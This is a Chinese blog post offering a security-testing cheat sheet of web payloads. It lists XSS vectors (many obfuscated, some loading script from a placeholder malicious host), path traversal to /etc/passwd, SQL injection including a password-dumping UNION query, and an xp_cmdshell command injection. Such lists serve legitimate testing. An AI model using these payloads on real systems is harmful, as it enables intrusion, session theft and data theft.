`

xss 安全测试

    博客分类:
  • WEB
阅读更多

测试用例:还是挺管用的,真的能发现潜在的bug   

 <script>alert(document.cookie)</script>
  ='><script>alert(document.cookie)</script>
  <script>alert(document.cookie)</script>
  <script>alert(vulnerable)</script>
  %3Cscript%3Ealert('XSS')%3C/script%3E
  <script>alert('XSS')</script>
  <img src="javascript:alert('XSS')">
  %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  %22%3cscript%3ealert(%22x ss%22)%3c/script%3e
  %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
  %3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
  %3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
  %3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
  <script>alert('Vulnerable');</script>
  <script>alert('Vulnerable')</script>
  ?sql_debug=1
  a%5c.aspx
  a.jsp/<script>alert('Vulnerable')</script>
  a?<script>alert('Vulnerable')</script>
  "><script>alert('Vulnerable')</script>
  ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
  %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  %3Cscript%3Ealert(document. domain);%3C/script%3E&
   %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
  ../../../../../../../../etc/passwd
  ..\..\..\..\..\..\..\..\windows\system.ini
  \..\..\..\..\..\..\..\..\windows\system.ini
  '';!--"<XSS>=&{()}
  <IMG SRC="javascript:alert('XSS');">
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=JaVaScRiPt:alert('XSS')>
  <IMG SRC=JaVaScRiPt:alert("XSS")>
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  <IMG SRC="javascript:alert('XSS');">
  "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  <IMG SRC=" javascript:alert('XSS');">
  <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  <BODY BACKGROUND="javascript:alert('XSS')">
  <BODY ONLOAD=alert('XSS')>
  <IMG DYNSRC="javascript:alert('XSS')">
  <IMG LOWSRC="javascript:alert('XSS')">
  <BGSOUND SRC="javascript:alert('XSS');">
  <br size="&{alert('XSS')}">
  <LAYER SRC="http://惡意網址/a.js"></layer>
  <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  <IMG SRC='vbscript:msgbox("XSS")'>
  <IMG SRC="mocha:[code]">
  <IMG SRC="livescript:[code]">
  <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  <IFRAME SRC=javascript:alert('XSS')></IFRAME>
  <FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
  <TABLE BACKGROUND="javascript:alert('XSS')">
  <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  <DIV STYLE="behaviour: url('http://惡意網址/exploit.html');">
  <DIV STYLE="width: expression(alert('XSS'));">
  <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  <IMG STYLE='x ss:expre\ssion(alert("XSS"))'>
  <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  <BASE HREF="javascript:alert('XSS');//">
  getURL("javascript:alert('XSS')")
  a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
  <XML SRC="javascript:alert('XSS');">
  "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  <SCRIPT SRC="http://惡意網址/x ss.jpg"></SCRIPT>
  <IMG SRC="javascript:alert('XSS')"
  <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://惡意網址/a.js></SCRIPT>'"-->
  <IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
  <SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT a=">" '' SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT "a='>'" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
  <A HREF=http://惡意網址/>link</A>
  admin'--
  ' or 0=0 --
  " or 0=0 --
  or 0=0 --
  ' or 0=0 #
  " or 0=0 #
  or 0=0 #
  ' or 'x'='x
  " or "x"="x
  ') or ('x'='x
  ' or 1=1--
  " or 1=1--
  or 1=1--
  ' or a=a--
  " or "a"="a
  ') or ('a'='a
  ") or ("a"="a
  hi" or "a"="a
  hi" or 1=1 --
  hi' or 1=1 --
  hi' or 'a'='a
  hi') or ('a'='a
  hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>

分享到:
评论

相关推荐

    XSS测试代码大全————

    XSS测试代码 安全测试 XSS测试代码大全

    Web应用安全:简单XSS测试脚本(实验).docx

    简单XSS测试脚本 一、实验目的 了解XSS的有关知识; 了解XSS的实际操作; 了解XSS的攻击原理。 二、实验内容 在主机上搭建pikachu站点; 在站点上进行简单XSS测试脚本。 三、实验内容与步骤 在主机上搭建pikachu站点...

    安全测试之XSS.doc

    安全测试之XSS.doc

    关于Web应用安全中XSS漏洞测试方法的研究.docx

    这是大三时软件测试课程的结课论文,论文题目是:《关于Web应用安全中XSS漏洞测试方法的研究》。

    Web安全测试之XSS

    Web安全测试之XSS,

    测试文档(Xss漏洞)

    从测试XSS漏洞,教你如何测试安全漏洞,打开文档有详细步骤

    jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞

    动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...

    Web安全测试之XSS实例讲解

    Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者...

    网站类安全测试流程规范

    测试工程师目前主要采用两种方法做安全测试,一种是采用自动化安全工具Hatrix扫描测试,自动化安全工具主要能够覆盖XSS、CSRF、SQL Injection,一种是对URL Redirect和Access control这两种漏洞采用手工方式进行测试...

    E076-PHP应用安全-存储型XSS漏洞开发及渗透测试.pdf

    E076-PHP应用安全-存储型XSS漏洞开发及渗透测试

    WEB安全测试分类及防范测试方法.docx

    WEB安全测试分类及防范测试方法 1 Web 应用程序布署环境测试 2 1.1HTTP 请求引发漏洞的测试 2 1.2 操作系统目录安全性及Web 应用程序布署环境目录遍历问题测试 2 2 应用程序测试 3 2.1 SQL 注入漏洞测试 3 ...

    安全编程-XSS跨站脚本介绍.

    XSS学习资料,安全编程新手必备 内容是PPT课件形式,包含XSS测试代码,可供参考

    XSS & SQL注入

    在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力...同时我将阐述的不仅仅是XSS,而是所有的web安全.

    XSS跨站脚本攻击剖析与防御.pdf

    XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...

    XSS跨站脚本攻击剖析与防御

    XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...

    xss-labs-master.zip(xss注入通关游戏/靶场)

    经典的xss注入通关游戏,搭建简单。适合网络安全测试人员

    XSS跨站脚本gj剖析与防御.pdf

    《XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式...

    Web应用安全:存储型XSS习题(实验习题).docx

    Web应用安全:存储型XSS习题(实验习题).docx

    Xss测试平台.zip

    XSSer——用于检测和利用XSS漏洞的自动Web测试框架工具 XSS是一种非常常见的漏洞类型,它分布非常广泛,且比较容易被检测到。 攻击者可以在无需验证的情况下将不受信任的JavaScript片段插入到应用程序中。然后,该...

    自动化检测XSS漏洞插件

    自动化检测XSS漏洞插件,希望对大家使用有帮助,一起进步,一起分享

Global site tag (gtag.js) - Google Analytics